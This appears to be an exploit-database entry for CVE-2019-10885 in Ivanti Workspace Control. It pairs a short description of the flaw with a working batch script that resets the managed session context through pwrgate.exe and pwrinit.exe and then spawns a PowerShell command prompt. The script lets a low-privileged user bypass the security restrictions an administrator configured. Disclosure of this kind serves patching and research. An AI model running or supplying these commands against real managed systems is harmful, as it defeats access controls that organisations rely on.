Ivanti Workspace Manager Security Bypass

Related Vulnerabilities: CVE-2019-10885  
Publish Date: 18 Mar 2020
Author: Juan Sacco
                							

                Rem Remarks CVE-2019-10885 - 0day <jsacco@exploitpack.com>
Rem An issue was discovered in Ivanti Workspace Control before
10.3.90.0. Local authenticated
Rem users with low privileges in a Workspace Control managed session
can bypass Workspace Control Rem security features configured for this
session by resetting the session context.

"%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrgate.exe -2"
"%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrinit.exe"
cmd.exe /k powershell.exe
<p>